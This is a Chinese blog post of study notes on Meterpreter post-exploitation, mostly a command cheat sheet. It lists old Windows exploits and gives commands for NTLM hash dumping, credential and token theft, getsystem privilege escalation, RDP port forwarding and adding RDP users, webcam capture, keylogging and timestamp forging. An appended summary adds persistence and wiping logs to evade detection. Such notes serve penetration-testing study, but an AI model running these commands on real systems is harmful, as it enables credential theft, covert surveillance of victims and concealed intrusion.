关于 后渗透 - Meterpreter 的使用

关于 后渗透 - Meterpreter 的使用

·关于一些漏洞

历史原因,关于一些低版本的 2013操作系统,还仍存在着 WinXPenSP3 的漏洞

网络服务器攻击渗透:ms08_067 【WinXPenSP3】 ms10_018
应用软件格式渗透:利用 word 去渗透(MS10-087) >search rtf
“永恒之蓝”(比特币勒索病毒) :ms17-010

· meterpreter 的一些后渗透攻击使用方法

1、上传文件到 Windows 主机
——> 简单的说,你可以上传本机的任意文件到远程目标主机中。

meterpreter> upload <file> <destination>

**注意**:使用 -r 参数可以递归上传目录和文件

2、从 Windows 主机下载文件
—— > download 命令可以下载远程主机上的文件

meterpreter> download <file><path to save>

注意:Windows 路径要使用双斜线!!!
如果我们需要递归下载整个目录包括子目录和文件,我们可以使用 download -r 命令

3、在目标主机上执行 exe 文件
—— > 使用 execute 命令在目标主机上执行应用程序

meterpreter> execute -f <path> [options]

4、创建 CMD 新通道
—— > 在目标主机上执行命令提示符

meterpreter> execute -f cmd -c

5、显示进程
—— > ps 命令 会显示目标主机上所有正在运行的进程

meterpreter> ps

6、获取目标主机的 cmd shell
—— > shell命令 可以进入主机的 cmd

meterpreter> shell

7、获取 admin 权限:

meterpreter> getsystem

8、使用 Hashdump 转储所有 hash 值:
—— > 我们可以使用 meterpreter shelldump目标主机的当前系统账户和密码。转储的内容是 NTML 哈希格式,网上有很多工具和技巧来破解它们。
NTLM 在线破解:https://hashkiller.co.uk/ntlm-decrypter.aspx
以下是我整理的关于 Hash 学习的一些网站:
https://gchq.github.io/CyberChef/ https://zh.wikipedia.org/wiki/%E6%95%A3%E5%88%97%E5%87%BD%E6%95%B8

meterpreter> hashdump

// 输出的每一行内容格式如下:
		Username:SID;LM hash:NTML  hash:::

9、使用 Credcollect 转储 hash 值:
—— > 还有一个类似的脚本叫 credentinal_collector,也可以收集目标主机的 tokens

meterpreter> run credcollect

10、创建端口转发:
—— > meterpreter shell 中的 portfwd 命令是转发技术中最常用的一个命令,可以让攻击系统访问本来无法直接访问的目标主机。

add 选项会将端口转发添加到列表中,而且本质上会创建一个隧道。
!!!请注意:这个隧道存在于 meterpreter 控制台之外,任何终端会话都可以使用

portfwd add -l 6666 -p 3389 -r 127.0.0.1 #将目标主机的3389端口转发到本地 6666端口

rdesktop -127.0.0.1
远程桌面连接:127.0.0.1:6666

11、删除端口转发:
—— > 跟创建端口转发命令类似,这条命令是删除一条端口转发的记录

meterpreter> portfwd delete -l<portnumber> -p <portnumber> -r <Target-ip>

显示所有端口转发记录: portfwd list
删除所有的记录: portfwd flush

12、在目标主机上搜索文件:
—— > 定位查找目标主机上特定文件。可以搜索整个文件系统,也可以搜索特定的文件夹。

例如: meterpreter> search -f txt 

13、获取用户 ID:
—— > getuid 命令会显示主机上运行 meterpreter 服务的用户

meterpreter> getuid

14、获取系统信息:
—— > sysinfo 命令会显示系统排名,操作系统,架构和语言等。

meterpreter> sysinfo

15、模拟任意用户(token 操作):
—— > 这个进程对于攻击像微软活动目录这样的分布式系统非常有帮助,因为在微软活动目录中,本地访问并没有多大用,但是如果能搞到凭证尤其是管理员凭证,那就非常有用了。
incognito 最开始是一个独立的应用,当你成功入侵系统后可以用它来模拟用户**tokens。**这个应用后来集成到了 metasploit ,并且最终集成到了 meterpreter 中,使用如下:

  • meterpreter 会话 中加载这个模块,只要输入 use incognito 命令即可

  • 输入 list_tokens -u 来显示所有有效的 tokens

  • 然后我们需要模拟某个 token 来获取其权限。还有注意,如果成功模拟了一个 token,我们可以使用 getuid 命令来检查当前用户的 ID

  • user incognito

  • list_tokens -u

  • impersonate_token "Machine\\user"

16、webcam 摄像头命令:

meterpreter> webcam_list #查看摄像头
meterpreter> webcam_snap #通过摄像头拍照
meterpreter> webcam_stream #通过摄像头开启视频

17、execute 执行文件:

meterpreter> execute #在目标机中执行文件
meterpreter> execute -H -i -f cmd.exe # 创建新进程 cmd.exe, -H 不可见,-i 交互

18、timestomp 伪造时间戳:

meterpreter> timestomp C:// -h #查看帮助
meterpreter> timestomp -v C://2.txt #查看时间戳
meterpreter> timestomp C://2.txt -f C://1.txt #将 1.txt的时间戳复制给2.txt

19、enable_rdp 脚本开启 3389:

meterpreter> run post/windows/manage/enable_rdp #开启远程桌面
meterpreter> run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456 #添加用户
meterpreter> run post/windows/manage/enable_rdp FORWARD=true LPORT=6662 #将 3389端口转发到 6662

/usr/share/metasploit-framework/modules/post/windows/manage/enable_rdp.rb

通过 enable_rdp.rb 脚本可知:开启 rdp 是通过 reg 修改注册表;添加用户 是调用 cmd.exe 通过 net user 添加;端口转发是利用 portfwd 命令

20、键盘记录:

meterpreter> keyscan_start #开始键盘记录
meterpreter> keyscan_dump #导出记录数据
meterpreter> keyscan_stop #结束键盘记录

其它详细信息可以查看: https://xz.aliyun.com/t/2536

以上是一些笔记整理与学习,欢迎评论交流学习!

  • 1
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Meterpreter是一种强大的后渗透工具,它可以在目标机器上执行各种命令和操作,包括文件系统访问、进程管理、网络扫描、密码破解、漏洞利用等等。在使用Meterpreter进行后渗透时,可以采取以下几个步骤: 1. 获取系统信息:使用sysinfo命令可以获取目标系统的详细信息,包括操作系统版本、硬件配置、用户信息等等,这些信息有助于后续的攻击操作。 2. 收集凭证信息:使用hashdump命令可以获取目标系统上保存的用户密码哈希值,然后可以使用破解工具进行破解,从而获取有效的登录凭证。 3. 扫描网络和主机:使用portscan和subnet命令可以对目标网络进行扫描,发现开放的服务和漏洞,然后可以使用exploit模块进行攻击。 4. 接管会话和持久化:使用migrate命令可以将Meterpreter会话转移到目标系统中的其他进程中,从而提高攻击的稳定性和隐蔽性。同时,还可以使用persist命令将Meterpreter程序持久化到目标系统中,以便于下次连接。 5. 进行攻击操作:利用Meterpreter的各种模块和命令,可以进行各种攻击操作,包括远程执行命令、上传下载文件、横向移动、权限提升、漏洞利用等等。 6. 残留清理:完成攻击后,应该进行残留的清理工作,包括删除日志文件、清除历史记录、删除痕迹等等,以避免被发现和追踪。 总之,Meterpreter是一款非常强大的后渗透工具,可以帮助渗透测试人员和黑客更好地进行攻击和渗透测试工作。但是,在使用Meterpreter进行攻击时,应该遵循道德和法律的原则,避免对他人造成不必要的损害和危害。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值